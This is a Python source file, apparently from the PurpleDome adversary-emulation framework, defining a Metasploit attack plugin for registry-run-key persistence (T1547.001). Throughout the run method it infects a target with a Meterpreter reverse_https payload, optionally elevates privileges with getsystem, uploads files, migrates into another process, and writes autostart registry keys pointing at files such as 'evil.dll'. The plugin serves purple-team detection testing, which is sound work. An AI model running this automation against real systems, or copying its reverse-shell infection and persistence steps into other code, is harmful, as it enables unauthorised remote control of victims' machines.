mirror of https://github.com/avast/PurpleDome
You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
124 lines
5.7 KiB
Python
124 lines
5.7 KiB
Python
#!/usr/bin/env python3
|
|
|
|
# A plugin to nmap targets slow motion, to evade sensors
|
|
|
|
from plugins.base.attack import AttackPlugin, Requirement
|
|
from app.interface_sfx import CommandlineColors
|
|
import os
|
|
|
|
|
|
class MetasploitAutostart1Plugin(AttackPlugin):
|
|
|
|
# Boilerplate
|
|
name = "metasploit_registry_autostart_1"
|
|
description = "Modify the registry to autostart"
|
|
ttp = "T1547.001"
|
|
references = ["https://attack.mitre.org/techniques/T1547/001/"]
|
|
tactics = "Persistence"
|
|
tactics_id = "TA0003"
|
|
|
|
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
|
|
requirements = [Requirement.METASPLOIT]
|
|
|
|
def __init__(self):
|
|
super().__init__()
|
|
self.plugin_path = __file__
|
|
|
|
def run(self, targets):
|
|
""" Run the command
|
|
|
|
@param targets: A list of targets, ip addresses will do
|
|
"""
|
|
|
|
res = ""
|
|
payload_type = "windows/x64/meterpreter/reverse_https"
|
|
payload_name = "babymetal.exe"
|
|
target = self.targets[0]
|
|
|
|
# self.connect_metasploit()
|
|
# ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
|
|
self.metasploit.smart_infect(target,
|
|
# lhost=ip,
|
|
payload=payload_type,
|
|
outfile=payload_name,
|
|
format="exe",
|
|
architecture="x64")
|
|
|
|
###
|
|
|
|
rkeys = [r"HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",
|
|
r"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",
|
|
r"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\0001\\\\Depend"
|
|
]
|
|
regkey = rkeys[self.conf['regkey_variant']]
|
|
# value = "purpledome"
|
|
|
|
data_options = [r"c:\\windows\\system32\\calc.exe ",
|
|
r"c:\\temp\\evil.dll",
|
|
r"c:\\dummy.dll"]
|
|
data = data_options[self.conf['data_options']]
|
|
# data = r"c:\\windows\\system32\\calc.exe "
|
|
|
|
# regkey = self.conf['regkey']
|
|
value = self.conf["value"]
|
|
# data = self.conf["data"]
|
|
command_set = f"reg setval -k {regkey} -v {value} -d {data}"
|
|
command_create = f"reg createkey -k {regkey}"
|
|
|
|
if self.conf["getsystem"]:
|
|
self.metasploit.getsystem(target,
|
|
variant=0,
|
|
situation_description="Elevating privileges to write to the registry",
|
|
countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
|
|
)
|
|
|
|
self.attack_logger.vprint(
|
|
f"{CommandlineColors.OKCYAN}Execute {command_set} through meterpreter{CommandlineColors.ENDC}", 1)
|
|
|
|
if "upload" in self.conf and len(self.conf["upload"]):
|
|
print(f"Before {self.metasploit.meterpreter_execute_on(['pwd'], target)}")
|
|
print(self.metasploit.meterpreter_execute_on(["cd c:\\"], target))
|
|
print(f"After {self.metasploit.meterpreter_execute_on(['pwd'], target)}")
|
|
for src in self.conf["upload"]:
|
|
print(src)
|
|
self.attacker_machine_plugin.put(
|
|
os.path.join(os.path.dirname(self.plugin_path), "resources", src), src)
|
|
self.metasploit.upload(target, src, src) # Make sure the process to hide behind is running
|
|
|
|
if "start_commands" in self.conf and len(self.conf["start_commands"]):
|
|
for cmd in self.conf["start_commands"]:
|
|
print(cmd)
|
|
self.metasploit.meterpreter_execute_on([cmd], target) # Make sure the process to hide behind is running
|
|
|
|
if self.conf["migrate"]:
|
|
tgt = self.conf["migrate_target"]
|
|
print(f"Migrate to {tgt}")
|
|
self.metasploit.migrate(target, name=tgt)
|
|
|
|
logid = self.attack_logger.start_metasploit_attack(source=self.attacker_machine_plugin.get_ip(),
|
|
target=target.get_ip(),
|
|
metasploit_command=command_set,
|
|
ttp=self.ttp,
|
|
name="registry add run key",
|
|
description=self.description,
|
|
tactics=self.tactics,
|
|
tactics_id=self.tactics_id,
|
|
situation_description="",
|
|
countermeasure="",
|
|
# sourcefile=self.get_filename(),
|
|
# sourceline=self.get_linenumber()
|
|
)
|
|
res = self.metasploit.meterpreter_execute_on([command_create], target)
|
|
print(res)
|
|
res = self.metasploit.meterpreter_execute_on([command_set], target)
|
|
print(res)
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker_machine_plugin.get_ip(),
|
|
target=target.get_ip(),
|
|
metasploit_command=command_set,
|
|
ttp=self.ttp,
|
|
logid=logid,
|
|
result=res)
|
|
###
|
|
# breakpoint()
|
|
return res
|